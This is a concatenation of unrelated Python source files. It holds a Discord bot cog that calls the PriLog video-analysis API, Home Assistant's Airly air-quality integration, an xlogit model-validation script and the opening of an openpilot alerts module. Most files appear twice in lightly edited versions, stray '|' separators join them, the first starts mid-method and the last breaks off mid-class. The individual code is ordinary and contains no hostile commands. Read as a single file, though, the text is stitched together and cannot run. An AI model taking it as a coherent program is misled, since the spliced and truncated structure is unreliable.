        # BUGFIX: the original nested single quotes inside single-quoted
        # f-strings (f'...{resp['status']}'), a SyntaxError before
        # Python 3.12; use double quotes for the subscript keys.
        self.logger.info(f'Try to get:{url}... status={resp["status"]}')
        # Status codes below 310 indicate a successful analysis
        if resp["status"] < 310:
            embed = discord.Embed(title=resp["result"]["title"],
                                  description=resp["msg"],
                                  color=0x6eace2)
            name = f'総ダメージ: {resp["result"]["total_damage"]}' if \
                resp["result"]["total_damage"] else '総ダメージ: 不明'
            embed.add_field(name=name,
                            value='```'
                            + resp["result"]["timeline_txt"]
                            + '```')
        else:
            embed = discord.Embed(title='解析失敗',
                                  description=f'ステータス: {resp["status"]}\n'
                                              f'メッセージ: {resp["msg"]}',
                                  color=0xed8ab0)
        await ctx.send(embed=embed)

    @commands.command()
    async def logb(self, ctx, url: str):
        """
        引数にクランバトル動画を渡すとPriLogを利用できます。
        /logbでは敵UB入りのタイムラインを取得します。
        例: /logb https://www.youtube.com/watch?v=mvLSw5vCpGU
        """
        resp = await self.get_prilog(url)
        self.logger.info(f'Try to get:{url}... status={resp["status"]}')
        if resp["status"] < 310:
            embed = discord.Embed(title=resp["result"]["title"],
                                  description=resp["msg"],
                                  color=0x6eace2)
            name = f'総ダメージ: {resp["result"]["total_damage"]}' if \
                resp["result"]["total_damage"] else '総ダメージ: 不明'
            # Same as /log but with the enemy-UB timeline
            embed.add_field(name=name,
                            value='```'
                            + resp["result"]["timeline_txt_enemy"]
                            + '```')
        else:
            embed = discord.Embed(title='解析失敗',
                                  description=f'ステータス: {resp["status"]}\n'
                                              f'メッセージ: {resp["msg"]}',
                                  color=0xed8ab0)
        await ctx.send(embed=embed)
def setup(bot):
    # discord.py extension entry point: register the PriLog cog on the bot
    bot.add_cog(PriLog(bot))
| import logging
import os
import aiohttp
import discord
from discord.ext import commands
PRILOG_TOKEN = os.environ["PRILOG_TOKEN"]
class PriLog(commands.Cog):
    """Prilog APIを利用します。"""
    # Discord cog wrapping the PriLog clan-battle video analysis API.
    # The command docstrings below are user-facing help text shown by
    # discord.py's help command, hence kept in Japanese.

    def __init__(self, bot):
        self.bot = bot
        self.logger = logging.getLogger('discord.PriLog')

    async def get_prilog(self, url):
        # Query the PriLog REST endpoint and return the decoded JSON payload
        async with aiohttp.ClientSession() as session:
            async with session.get('https://prilog.jp/rest/analyze'
                                   f'?Url={url}&Token={PRILOG_TOKEN}') as r:
                return await r.json()

    @commands.command()
    async def log(self, ctx, url: str):
        """
        引数にクランバトル動画を渡すとPriLogを利用できます。
        コマンドとURLの間に半角スペースを空けてください。
        例: /log https://www.youtube.com/watch?v=mvLSw5vCpGU
        """
        resp = await self.get_prilog(url)
        self.logger.info(f'Try to get:{url}... status={resp["status"]}')
        # Status codes below 310 indicate a successful analysis
        if resp["status"] < 310:
            embed = discord.Embed(title=resp["result"]["title"],
                                  description=resp["msg"],
                                  color=0x6eace2)
            # Field title: total damage, or "unknown" when not detected
            name = f'総ダメージ: {resp["result"]["total_damage"]}' if \
                resp["result"]["total_damage"] else '総ダメージ: 不明'
            embed.add_field(name=name,
                            value='```'
                            + resp["result"]["timeline_txt"]
                            + '```')
        else:
            # Analysis failed: report the API's status and message
            embed = discord.Embed(title='解析失敗',
                                  description=f'ステータス: {resp["status"]}\n'
                                              f'メッセージ: {resp["msg"]}',
                                  color=0xed8ab0)
        await ctx.send(embed=embed)

    @commands.command()
    async def logb(self, ctx, url: str):
        """
        引数にクランバトル動画を渡すとPriLogを利用できます。
        /logbでは敵UB入りのタイムラインを取得します。
        例: /logb https://www.youtube.com/watch?v=mvLSw5vCpGU
        """
        resp = await self.get_prilog(url)
        self.logger.info(f'Try to get:{url}... status={resp["status"]}')
        if resp["status"] < 310:
            embed = discord.Embed(title=resp["result"]["title"],
                                  description=resp["msg"],
                                  color=0x6eace2)
            name = f'総ダメージ: {resp["result"]["total_damage"]}' if \
                resp["result"]["total_damage"] else '総ダメージ: 不明'
            # Same as /log but with the enemy-UB timeline
            embed.add_field(name=name,
                            value='```'
                            + resp["result"]["timeline_txt_enemy"]
                            + '```')
        else:
            embed = discord.Embed(title='解析失敗',
                                  description=f'ステータス: {resp["status"]}\n'
                                              f'メッセージ: {resp["msg"]}',
                                  color=0xed8ab0)
        await ctx.send(embed=embed)
def setup(bot):
    # discord.py extension entry point: register the PriLog cog on the bot
    bot.add_cog(PriLog(bot))
|
"""The Airly integration."""
from __future__ import annotations
from datetime import timedelta
import logging
from math import ceil
from aiohttp import ClientSession
from aiohttp.client_exceptions import ClientConnectorError
from airly import Airly
from airly.exceptions import AirlyError
import async_timeout
from homeassistant.components.air_quality import DOMAIN as AIR_QUALITY_PLATFORM
from homeassistant.config_entries import ConfigEntry
from homeassistant.const import CONF_API_KEY, CONF_LATITUDE, CONF_LONGITUDE
from homeassistant.core import HomeAssistant
from homeassistant.helpers import entity_registry
from homeassistant.helpers.aiohttp_client import async_get_clientsession
from homeassistant.helpers.device_registry import async_get_registry
from homeassistant.helpers.update_coordinator import DataUpdateCoordinator, UpdateFailed
from homeassistant.util import dt as dt_util
from .const import (
ATTR_API_ADVICE,
ATTR_API_CAQI,
ATTR_API_CAQI_DESCRIPTION,
ATTR_API_CAQI_LEVEL,
CONF_USE_NEAREST,
DOMAIN,
MAX_UPDATE_INTERVAL,
MIN_UPDATE_INTERVAL,
NO_AIRLY_SENSORS,
)
PLATFORMS = ["sensor"]
_LOGGER = logging.getLogger(__name__)
def set_update_interval(instances_count: int, requests_remaining: int) -> timedelta:
    """
    Return data update interval.

    The number of requests is reset at midnight UTC so we calculate the update
    interval based on number of minutes until midnight, the number of Airly
    instances and the number of remaining requests.
    """
    now = dt_util.utcnow()
    midnight = dt_util.find_next_time_expression_time(
        now, seconds=[0], minutes=[0], hours=[0]
    )
    minutes_to_midnight = (midnight - now).total_seconds() / 60
    # Spread the remaining request budget evenly across all instances,
    # then clamp into the allowed [MIN, MAX] window.
    raw_minutes = ceil(minutes_to_midnight / requests_remaining * instances_count)
    clamped_minutes = min(max(raw_minutes, MIN_UPDATE_INTERVAL), MAX_UPDATE_INTERVAL)
    interval = timedelta(minutes=clamped_minutes)
    _LOGGER.debug("Data will be update every %s", interval)
    return interval
async def async_setup_entry(hass: HomeAssistant, entry: ConfigEntry) -> bool:
    """Set up Airly as config entry."""
    api_key = entry.data[CONF_API_KEY]
    latitude = entry.data[CONF_LATITUDE]
    longitude = entry.data[CONF_LONGITUDE]
    use_nearest = entry.data.get(CONF_USE_NEAREST, False)
    # For backwards compat, set unique ID
    if entry.unique_id is None:
        hass.config_entries.async_update_entry(
            entry, unique_id=f"{latitude}-{longitude}"
        )
    # identifiers in device_info should use tuple[str, str] type, but latitude and
    # longitude are float, so we convert old device entries to use correct types
    # We used to use a str 3-tuple here sometime, convert that to a 2-tuple too.
    # (The pre-loop assignment of old_ids in the previous version was dead
    # code -- the for target rebinds it immediately -- so it was removed.)
    device_registry = await async_get_registry(hass)
    for old_ids in (
        (DOMAIN, latitude, longitude),
        (
            DOMAIN,
            str(latitude),
            str(longitude),
        ),
    ):
        device_entry = device_registry.async_get_device({old_ids})  # type: ignore[arg-type]
        if device_entry and entry.entry_id in device_entry.config_entries:
            new_ids = (DOMAIN, f"{latitude}-{longitude}")
            device_registry.async_update_device(
                device_entry.id, new_identifiers={new_ids}
            )
    websession = async_get_clientsession(hass)
    # Start at the minimum interval; the coordinator adapts it later based
    # on the remaining API request budget.
    update_interval = timedelta(minutes=MIN_UPDATE_INTERVAL)
    coordinator = AirlyDataUpdateCoordinator(
        hass, websession, api_key, latitude, longitude, update_interval, use_nearest
    )
    await coordinator.async_config_entry_first_refresh()
    hass.data.setdefault(DOMAIN, {})
    hass.data[DOMAIN][entry.entry_id] = coordinator
    hass.config_entries.async_setup_platforms(entry, PLATFORMS)
    # Remove air_quality entities from registry if they exist
    ent_reg = entity_registry.async_get(hass)
    unique_id = f"{coordinator.latitude}-{coordinator.longitude}"
    if entity_id := ent_reg.async_get_entity_id(
        AIR_QUALITY_PLATFORM, DOMAIN, unique_id
    ):
        _LOGGER.debug("Removing deprecated air_quality entity %s", entity_id)
        ent_reg.async_remove(entity_id)
    return True
async def async_unload_entry(hass: HomeAssistant, entry: ConfigEntry) -> bool:
    """Unload a config entry."""
    # Drop the stored coordinator only if every platform unloaded cleanly
    if unload_ok := await hass.config_entries.async_unload_platforms(entry, PLATFORMS):
        hass.data[DOMAIN].pop(entry.entry_id)
    return unload_ok
class AirlyDataUpdateCoordinator(DataUpdateCoordinator):
    """Define an object to hold Airly data."""

    def __init__(
        self,
        hass: HomeAssistant,
        session: ClientSession,
        api_key: str,
        latitude: float,
        longitude: float,
        update_interval: timedelta,
        use_nearest: bool,
    ) -> None:
        """Initialize."""
        self.latitude = latitude
        self.longitude = longitude
        self.airly = Airly(api_key, session)
        # When True, query the nearest installation instead of the point API
        self.use_nearest = use_nearest
        super().__init__(hass, _LOGGER, name=DOMAIN, update_interval=update_interval)

    async def _async_update_data(self) -> dict[str, str | float | int]:
        """Update data via library."""
        data: dict[str, str | float | int] = {}
        if self.use_nearest:
            measurements = self.airly.create_measurements_session_nearest(
                self.latitude, self.longitude, max_distance_km=5
            )
        else:
            measurements = self.airly.create_measurements_session_point(
                self.latitude, self.longitude
            )
        with async_timeout.timeout(20):
            try:
                await measurements.update()
            except (AirlyError, ClientConnectorError) as error:
                raise UpdateFailed(error) from error
        _LOGGER.debug(
            "Requests remaining: %s/%s",
            self.airly.requests_remaining,
            self.airly.requests_per_day,
        )
        # Airly API sometimes returns None for requests remaining so we update
        # update_interval only if we have valid value.
        if self.airly.requests_remaining:
            self.update_interval = set_update_interval(
                len(self.hass.config_entries.async_entries(DOMAIN)),
                self.airly.requests_remaining,
            )
        values = measurements.current["values"]
        index = measurements.current["indexes"][0]
        standards = measurements.current["standards"]
        if index["description"] == NO_AIRLY_SENSORS:
            raise UpdateFailed("Can't retrieve data: no Airly sensors in this area")
        for value in values:
            data[value["name"]] = value["value"]
        # BUGFIX: the original nested double quotes inside double-quoted
        # f-strings (f"{standard["pollutant"]}_LIMIT"), a SyntaxError before
        # Python 3.12; use single quotes for the subscript keys.
        for standard in standards:
            data[f"{standard['pollutant']}_LIMIT"] = standard["limit"]
            data[f"{standard['pollutant']}_PERCENT"] = standard["percent"]
        data[ATTR_API_CAQI] = index["value"]
        data[ATTR_API_CAQI_LEVEL] = index["level"].lower().replace("_", " ")
        data[ATTR_API_CAQI_DESCRIPTION] = index["description"]
        data[ATTR_API_ADVICE] = index["advice"]
        return data
| """The Airly integration."""
from __future__ import annotations
from datetime import timedelta
import logging
from math import ceil
from aiohttp import ClientSession
from aiohttp.client_exceptions import ClientConnectorError
from airly import Airly
from airly.exceptions import AirlyError
import async_timeout
from homeassistant.components.air_quality import DOMAIN as AIR_QUALITY_PLATFORM
from homeassistant.config_entries import ConfigEntry
from homeassistant.const import CONF_API_KEY, CONF_LATITUDE, CONF_LONGITUDE
from homeassistant.core import HomeAssistant
from homeassistant.helpers import entity_registry
from homeassistant.helpers.aiohttp_client import async_get_clientsession
from homeassistant.helpers.device_registry import async_get_registry
from homeassistant.helpers.update_coordinator import DataUpdateCoordinator, UpdateFailed
from homeassistant.util import dt as dt_util
from .const import (
ATTR_API_ADVICE,
ATTR_API_CAQI,
ATTR_API_CAQI_DESCRIPTION,
ATTR_API_CAQI_LEVEL,
CONF_USE_NEAREST,
DOMAIN,
MAX_UPDATE_INTERVAL,
MIN_UPDATE_INTERVAL,
NO_AIRLY_SENSORS,
)
PLATFORMS = ["sensor"]
_LOGGER = logging.getLogger(__name__)
def set_update_interval(instances_count: int, requests_remaining: int) -> timedelta:
    """
    Return data update interval.

    The number of requests is reset at midnight UTC, so the interval is
    derived from the minutes remaining until midnight, spread over the
    remaining requests and every configured Airly instance, then clamped
    to the allowed [MIN_UPDATE_INTERVAL, MAX_UPDATE_INTERVAL] range.
    """
    now = dt_util.utcnow()
    next_midnight = dt_util.find_next_time_expression_time(
        now, seconds=[0], minutes=[0], hours=[0]
    )
    minutes_left = (next_midnight - now).total_seconds() / 60

    # Spread the remaining quota across all instances, then clamp.
    raw_minutes = ceil(minutes_left / requests_remaining * instances_count)
    clamped_minutes = min(max(raw_minutes, MIN_UPDATE_INTERVAL), MAX_UPDATE_INTERVAL)

    interval = timedelta(minutes=clamped_minutes)
    _LOGGER.debug("Data will be update every %s", interval)
    return interval
async def async_setup_entry(hass: HomeAssistant, entry: ConfigEntry) -> bool:
    """Set up Airly as config entry."""
    api_key = entry.data[CONF_API_KEY]
    latitude = entry.data[CONF_LATITUDE]
    longitude = entry.data[CONF_LONGITUDE]
    use_nearest = entry.data.get(CONF_USE_NEAREST, False)

    # For backwards compat, set unique ID
    if entry.unique_id is None:
        hass.config_entries.async_update_entry(
            entry, unique_id=f"{latitude}-{longitude}"
        )

    # identifiers in device_info should use tuple[str, str] type, but latitude and
    # longitude are float, so we convert old device entries to use correct types.
    # We used to use a str 3-tuple here sometime, convert that to a 2-tuple too.
    # BUGFIX: removed a dead pre-loop assignment of old_ids — it was
    # immediately shadowed by the loop variable below.
    device_registry = await async_get_registry(hass)
    for old_ids in (
        (DOMAIN, latitude, longitude),
        (DOMAIN, str(latitude), str(longitude)),
    ):
        device_entry = device_registry.async_get_device({old_ids})  # type: ignore[arg-type]
        if device_entry and entry.entry_id in device_entry.config_entries:
            new_ids = (DOMAIN, f"{latitude}-{longitude}")
            device_registry.async_update_device(
                device_entry.id, new_identifiers={new_ids}
            )

    websession = async_get_clientsession(hass)
    # Start with the minimal interval; it is re-tuned after the first refresh
    # based on the remaining API quota.
    update_interval = timedelta(minutes=MIN_UPDATE_INTERVAL)

    coordinator = AirlyDataUpdateCoordinator(
        hass, websession, api_key, latitude, longitude, update_interval, use_nearest
    )
    await coordinator.async_config_entry_first_refresh()

    hass.data.setdefault(DOMAIN, {})
    hass.data[DOMAIN][entry.entry_id] = coordinator

    hass.config_entries.async_setup_platforms(entry, PLATFORMS)

    # Remove air_quality entities from registry if they exist
    ent_reg = entity_registry.async_get(hass)
    unique_id = f"{coordinator.latitude}-{coordinator.longitude}"
    if entity_id := ent_reg.async_get_entity_id(
        AIR_QUALITY_PLATFORM, DOMAIN, unique_id
    ):
        _LOGGER.debug("Removing deprecated air_quality entity %s", entity_id)
        ent_reg.async_remove(entity_id)

    return True
async def async_unload_entry(hass: HomeAssistant, entry: ConfigEntry) -> bool:
    """Unload a config entry."""
    # Tear down the platforms first; only drop coordinator state on success.
    if unload_ok := await hass.config_entries.async_unload_platforms(entry, PLATFORMS):
        hass.data[DOMAIN].pop(entry.entry_id)
    return unload_ok
class AirlyDataUpdateCoordinator(DataUpdateCoordinator):
    """Define an object to hold Airly data."""

    def __init__(
        self,
        hass: HomeAssistant,
        session: ClientSession,
        api_key: str,
        latitude: float,
        longitude: float,
        update_interval: timedelta,
        use_nearest: bool,
    ) -> None:
        """Initialize.

        latitude/longitude select the measurement location; use_nearest
        queries the nearest Airly installation instead of the exact point.
        """
        self.latitude = latitude
        self.longitude = longitude
        self.airly = Airly(api_key, session)
        self.use_nearest = use_nearest

        super().__init__(hass, _LOGGER, name=DOMAIN, update_interval=update_interval)

    async def _async_update_data(self) -> dict[str, str | float | int]:
        """Update data via library.

        Returns a flat dict of pollutant values plus CAQI index attributes.
        Raises UpdateFailed on API/connection errors or when no Airly
        sensors exist in the configured area.
        """
        data: dict[str, str | float | int] = {}
        if self.use_nearest:
            measurements = self.airly.create_measurements_session_nearest(
                self.latitude, self.longitude, max_distance_km=5
            )
        else:
            measurements = self.airly.create_measurements_session_point(
                self.latitude, self.longitude
            )
        # NOTE(review): plain `with` on async_timeout is the legacy API;
        # newer async_timeout versions require `async with` — confirm the
        # pinned async_timeout version before changing.
        with async_timeout.timeout(20):
            try:
                await measurements.update()
            except (AirlyError, ClientConnectorError) as error:
                raise UpdateFailed(error) from error

        _LOGGER.debug(
            "Requests remaining: %s/%s",
            self.airly.requests_remaining,
            self.airly.requests_per_day,
        )

        # Airly API sometimes returns None for requests remaining so we update
        # update_interval only if we have valid value.
        if self.airly.requests_remaining:
            self.update_interval = set_update_interval(
                len(self.hass.config_entries.async_entries(DOMAIN)),
                self.airly.requests_remaining,
            )

        values = measurements.current["values"]
        index = measurements.current["indexes"][0]
        standards = measurements.current["standards"]

        # The API answers even outside sensor coverage; detect that case by
        # the index description and fail the update explicitly.
        if index["description"] == NO_AIRLY_SENSORS:
            raise UpdateFailed("Can't retrieve data: no Airly sensors in this area")

        for value in values:
            data[value["name"]] = value["value"]
        for standard in standards:
            data[f"{standard['pollutant']}_LIMIT"] = standard["limit"]
            data[f"{standard['pollutant']}_PERCENT"] = standard["percent"]

        data[ATTR_API_CAQI] = index["value"]
        data[ATTR_API_CAQI_LEVEL] = index["level"].lower().replace("_", " ")
        data[ATTR_API_CAQI_DESCRIPTION] = index["description"]
        data[ATTR_API_ADVICE] = index["advice"]
        return data
# ---- xlogit model validation script ----
# Regression check for xlogit: fits MultinomialLogit and MixedLogit models on
# the example datasets and prints log-likelihoods / predicted frequencies to
# compare against the expected values printed below.
import numpy as np
import pandas as pd
import sys
sys.path.append(".")  # Path of xlogit library root folder.
from xlogit import MixedLogit, MultinomialLogit

print("""
**EXPECTED:
MultinomialLogit
convergence=True LL=-4958.6491193376105 electricity
convergence=True LL=-1311.9796171079972 fishing
pred pier base: 0.09 updated: 0.107
MixedLogit
convergence=True LL=-3891.7177135708052 electricity
convergence=True LL=-2278.8977801007272 artificial
convergence=True LL=-1300.5113418149986 fishing
convergence=True LL=-1300.5113418149986 fishing batch
pred pier base: 0.089 updated: 0.105
pred pier base: 0.089 updated: 0.105 batch""")
print("")
print("**OBTAINED:")
print("MultinomialLogit")

# Electricity dataset
df = pd.read_csv("examples/data/electricity_long.csv")
varnames = ['pf', 'cl', 'loc', 'wk', 'tod', 'seas']
model = MultinomialLogit()
model.fit(X=df[varnames], y=df['choice'], varnames=varnames, ids=df['chid'],
          alts=df['alt'], verbose=0)
print(f"convergence={model.convergence} LL={model.loglikelihood} electricity")

# Fishing dataset
df = pd.read_csv("examples/data/fishing_long.csv")
varnames = ['price', 'catch']
model = MultinomialLogit()
model.fit(X=df[varnames], y=df['choice'], varnames=varnames, alts=df['alt'],
          ids=df['id'], verbose=0)
print(f"convergence={model.convergence} LL={model.loglikelihood} fishing")

# Predict
_, freq = model.predict(X=df[varnames], varnames=varnames, ids=df['id'],
                        alts=df['alt'], return_freq=True, verbose=0)
df.loc[df['alt']=='boat', 'price'] *= 1.2  # 20 percent price increase
_, freq_2 = model.predict(X=df[varnames], varnames=varnames, ids=df['id'],
                          alts=df['alt'], return_freq=True, verbose=0)
# BUGFIX: single quotes inside the f-string — reusing the outer double quotes
# is a SyntaxError on Python < 3.12 (PEP 701).
print(f"pred pier base: {freq['pier']} updated: {freq_2['pier']}")

print("MixedLogit")
# Electricity dataset
df = pd.read_csv("examples/data/electricity_long.csv")
varnames = ['pf', 'cl', 'loc', 'wk', 'tod', 'seas']
model = MixedLogit()
model.fit(X=df[varnames],
          y=df['choice'],
          varnames=varnames,
          ids=df['chid'],
          panels=df['id'],
          alts=df['alt'],
          n_draws=500,
          verbose=0,
          randvars={'pf': 'n', 'cl': 'n', 'loc': 'n',
                    'wk': 'n', 'tod': 'n', 'seas': 'n'})
print(f"convergence={model.convergence} LL={model.loglikelihood} electricity")

# Artificial dataset
df = pd.read_csv("examples/data/artificial_long.csv")
varnames = ['price', 'time', 'conven', 'comfort', 'meals', 'petfr',
            'emipp', 'nonsig1', 'nonsig2', 'nonsig3']
model = MixedLogit()
model.fit(X=df[varnames],
          y=df['choice'],
          varnames=varnames,
          alts=df['alt'],
          ids=df['id'],
          n_draws=500,
          panels=None,
          verbose=0,
          randvars={'meals': 'n', 'petfr': 'n', 'emipp': 'n'}
          )
print(f"convergence={model.convergence} LL={model.loglikelihood} artificial")

# Fishing dataset regular and batch
df = pd.read_csv("examples/data/fishing_long.csv")
varnames = ['price', 'catch']
model = MixedLogit()
model.fit(X=df[varnames], y=df['choice'], varnames=varnames, alts=df['alt'],
          ids=df['id'], n_draws=1000, randvars={'price': 'n', 'catch': 'n'}, verbose=0)
print(f"convergence={model.convergence} LL={model.loglikelihood} fishing")
varnames = ['price', 'catch']
model = MixedLogit()
model.fit(X=df[varnames], y=df['choice'], varnames=varnames, alts=df['alt'],
          ids=df['id'], n_draws=1000, randvars={'price': 'n', 'catch': 'n'}, verbose=0, batch_size=200)
print(f"convergence={model.convergence} LL={model.loglikelihood} fishing batch")

# Predict regular and batch
choices, freq = model.predict(X=df[varnames], varnames=varnames, ids=df['id'],
                              alts=df['alt'], return_freq=True, n_draws=1000, verbose=0)
df.loc[df['alt']=='boat', 'price'] *= 1.2  # 20 percent price increase
choices, freq_2 = model.predict(X=df[varnames], varnames=varnames, ids=df['id'],
                                alts=df['alt'], return_freq=True, n_draws=1000, verbose=0)
# BUGFIX: same quote-nesting fix as above.
print(f"pred pier base: {freq['pier']} updated: {freq_2['pier']}")

df = pd.read_csv("examples/data/fishing_long.csv")
choices, freq = model.predict(X=df[varnames], varnames=varnames, ids=df['id'],
                              alts=df['alt'], return_freq=True, n_draws=1000, verbose=0, batch_size=200)
df.loc[df['alt']=='boat', 'price'] *= 1.2  # 20 percent price increase
choices, freq_2 = model.predict(X=df[varnames], varnames=varnames, ids=df['id'],
                                alts=df['alt'], return_freq=True, n_draws=1000, verbose=0, batch_size=200)
print(f"pred pier base: {freq['pier']} updated: {freq_2['pier']} batch")
import numpy as np
# Validation script: fits MultinomialLogit and MixedLogit on the xlogit
# example datasets and prints results for manual comparison against the
# expected values printed below.
import pandas as pd
import sys
sys.path.append(".")  # Path of xlogit library root folder.
from xlogit import MixedLogit, MultinomialLogit

print("""
**EXPECTED:
MultinomialLogit
convergence=True LL=-4958.6491193376105 electricity
convergence=True LL=-1311.9796171079972 fishing
pred pier base: 0.09 updated: 0.107
MixedLogit
convergence=True LL=-3891.7177135708052 electricity
convergence=True LL=-2278.8977801007272 artificial
convergence=True LL=-1300.5113418149986 fishing
convergence=True LL=-1300.5113418149986 fishing batch
pred pier base: 0.089 updated: 0.105
pred pier base: 0.089 updated: 0.105 batch""")
print("")
print("**OBTAINED:")
print("MultinomialLogit")

# Electricity dataset
df = pd.read_csv("examples/data/electricity_long.csv")
varnames = ['pf', 'cl', 'loc', 'wk', 'tod', 'seas']
model = MultinomialLogit()
model.fit(X=df[varnames], y=df['choice'], varnames=varnames, ids=df['chid'],
          alts=df['alt'], verbose=0)
print(f"convergence={model.convergence} LL={model.loglikelihood} electricity")

# Fishing dataset
df = pd.read_csv("examples/data/fishing_long.csv")
varnames = ['price', 'catch']
model = MultinomialLogit()
model.fit(X=df[varnames], y=df['choice'], varnames=varnames, alts=df['alt'],
          ids=df['id'], verbose=0)
print(f"convergence={model.convergence} LL={model.loglikelihood} fishing")

# Predict
_, freq = model.predict(X=df[varnames], varnames=varnames, ids=df['id'],
                        alts=df['alt'], return_freq=True, verbose=0)
df.loc[df['alt']=='boat', 'price'] *= 1.2  # 20 percent price increase
_, freq_2 = model.predict(X=df[varnames], varnames=varnames, ids=df['id'],
                          alts=df['alt'], return_freq=True, verbose=0)
print(f"pred pier base: {freq['pier']} updated: {freq_2['pier']}")

print("MixedLogit")
# Electricity dataset
df = pd.read_csv("examples/data/electricity_long.csv")
varnames = ['pf', 'cl', 'loc', 'wk', 'tod', 'seas']
model = MixedLogit()
model.fit(X=df[varnames],
          y=df['choice'],
          varnames=varnames,
          ids=df['chid'],
          panels=df['id'],
          alts=df['alt'],
          n_draws=500,
          verbose=0,
          randvars={'pf': 'n', 'cl': 'n', 'loc': 'n',
                    'wk': 'n', 'tod': 'n', 'seas': 'n'})
print(f"convergence={model.convergence} LL={model.loglikelihood} electricity")

# Artificial dataset
df = pd.read_csv("examples/data/artificial_long.csv")
varnames = ['price', 'time', 'conven', 'comfort', 'meals', 'petfr',
            'emipp', 'nonsig1', 'nonsig2', 'nonsig3']
model = MixedLogit()
model.fit(X=df[varnames],
          y=df['choice'],
          varnames=varnames,
          alts=df['alt'],
          ids=df['id'],
          n_draws=500,
          panels=None,
          verbose=0,
          randvars={'meals': 'n', 'petfr': 'n', 'emipp': 'n'}
          )
print(f"convergence={model.convergence} LL={model.loglikelihood} artificial")

# Fishing dataset regular and batch
df = pd.read_csv("examples/data/fishing_long.csv")
varnames = ['price', 'catch']
model = MixedLogit()
model.fit(X=df[varnames], y=df['choice'], varnames=varnames, alts=df['alt'],
          ids=df['id'], n_draws=1000, randvars={'price': 'n', 'catch': 'n'}, verbose=0)
print(f"convergence={model.convergence} LL={model.loglikelihood} fishing")
varnames = ['price', 'catch']
model = MixedLogit()
model.fit(X=df[varnames], y=df['choice'], varnames=varnames, alts=df['alt'],
          ids=df['id'], n_draws=1000, randvars={'price': 'n', 'catch': 'n'}, verbose=0, batch_size=200)
print(f"convergence={model.convergence} LL={model.loglikelihood} fishing batch")

# Predict regular and batch
choices, freq = model.predict(X=df[varnames], varnames=varnames, ids=df['id'],
                              alts=df['alt'], return_freq=True, n_draws=1000, verbose=0)
df.loc[df['alt']=='boat', 'price'] *= 1.2  # 20 percent price increase
choices, freq_2 = model.predict(X=df[varnames], varnames=varnames, ids=df['id'],
                                alts=df['alt'], return_freq=True, n_draws=1000, verbose=0)
print(f"pred pier base: {freq['pier']} updated: {freq_2['pier']}")
df = pd.read_csv("examples/data/fishing_long.csv")
choices, freq = model.predict(X=df[varnames], varnames=varnames, ids=df['id'],
                              alts=df['alt'], return_freq=True, n_draws=1000, verbose=0, batch_size=200)
df.loc[df['alt']=='boat', 'price'] *= 1.2  # 20 percent price increase
choices, freq_2 = model.predict(X=df[varnames], varnames=varnames, ids=df['id'],
                                alts=df['alt'], return_freq=True, n_draws=1000, verbose=0, batch_size=200)
print(f"pred pier base: {freq['pier']} updated: {freq_2['pier']} batch")
from enum import IntEnum
from typing import Dict, Union, Callable
from cereal import log, car
import cereal.messaging as messaging
from common.realtime import DT_CTRL
from selfdrive.config import Conversions as CV
from selfdrive.locationd.calibrationd import MIN_SPEED_FILTER
# Short aliases for the capnp enums used throughout this module.
AlertSize = log.ControlsState.AlertSize
AlertStatus = log.ControlsState.AlertStatus
VisualAlert = car.CarControl.HUDControl.VisualAlert
AudibleAlert = car.CarControl.HUDControl.AudibleAlert
EventName = car.CarEvent.EventName
# Alert priorities
class Priority(IntEnum):
  """Display priority of an alert; a higher value preempts a lower one."""
  LOWEST = 0
  LOWER = 1
  LOW = 2
  MID = 3
  HIGH = 4
  HIGHEST = 5
# Event types
class ET:
  """String tags describing how an event affects the controls state machine."""
  ENABLE = 'enable'
  PRE_ENABLE = 'preEnable'
  NO_ENTRY = 'noEntry'
  WARNING = 'warning'
  USER_DISABLE = 'userDisable'
  SOFT_DISABLE = 'softDisable'
  IMMEDIATE_DISABLE = 'immediateDisable'
  PERMANENT = 'permanent'
# get event name from enum
# Reverse mapping: numeric event value -> capnp enumerant name (string).
EVENT_NAME = {v: k for k, v in EventName.schema.enumerants.items()}
class Events:
  """Tracks which events are active during a control cycle."""

  def __init__(self):
    # Events raised this cycle (re-seeded with static events on clear()).
    self.events = []
    # Events that persist across cycles (added with static=True).
    self.static_events = []
    # Per-event count of consecutive active cycles; used to honor
    # Alert.creation_delay in create_alerts().
    self.events_prev = dict.fromkeys(EVENTS.keys(), 0)

  @property
  def names(self):
    """Raw list of active event enum values."""
    return self.events

  def __len__(self):
    return len(self.events)

  def add(self, event_name, static=False):
    """Add an event for this cycle; static events survive clear()."""
    if static:
      self.static_events.append(event_name)
    self.events.append(event_name)

  def clear(self):
    """Start a new cycle: age still-active events, reset the rest."""
    self.events_prev = {k: (v + 1 if k in self.events else 0) for k, v in self.events_prev.items()}
    self.events = self.static_events.copy()

  def any(self, event_type):
    """Return True if any active event declares the given event type."""
    for e in self.events:
      if event_type in EVENTS.get(e, {}).keys():
        return True
    return False

  def create_alerts(self, event_types, callback_args=None):
    """Instantiate alerts for active events that match event_types.

    Callback-style EVENTS entries are invoked with callback_args; an alert
    is only emitted once its event has been active for creation_delay.
    """
    if callback_args is None:
      callback_args = []
    ret = []
    for e in self.events:
      types = EVENTS[e].keys()
      for et in event_types:
        if et in types:
          alert = EVENTS[e][et]
          if not isinstance(alert, Alert):
            # Callback entry: build the Alert dynamically.
            alert = alert(*callback_args)
          # events_prev counts completed cycles; +1 includes the current one.
          if DT_CTRL * (self.events_prev[e] + 1) >= alert.creation_delay:
            alert.alert_type = f"{EVENT_NAME[e]}/{et}"
            alert.event_type = et
            ret.append(alert)
    return ret

  def add_from_msg(self, events):
    """Merge events received in a capnp CarEvent list."""
    for e in events:
      self.events.append(e.name.raw)

  def to_msg(self):
    """Serialize active events to capnp CarEvent messages."""
    ret = []
    for event_name in self.events:
      event = car.CarEvent.new_message()
      event.name = event_name
      for event_type in EVENTS.get(event_name, {}).keys():
        setattr(event, event_type, True)
      ret.append(event)
    return ret
class Alert:
  """A single UI alert: text, appearance, priority and sound."""

  def __init__(self,
               alert_text_1: str,
               alert_text_2: str,
               alert_status: log.ControlsState.AlertStatus,
               alert_size: log.ControlsState.AlertSize,
               priority: Priority,
               visual_alert: car.CarControl.HUDControl.VisualAlert,
               audible_alert: car.CarControl.HUDControl.AudibleAlert,
               duration: float,
               alert_rate: float = 0.,
               creation_delay: float = 0.):
    self.alert_text_1 = alert_text_1
    self.alert_text_2 = alert_text_2
    self.alert_status = alert_status
    self.alert_size = alert_size
    self.priority = priority
    self.visual_alert = visual_alert
    self.audible_alert = audible_alert
    # Duration is stored in control frames, not seconds.
    self.duration = int(duration / DT_CTRL)
    self.alert_rate = alert_rate
    # Seconds the event must stay active before the alert is shown.
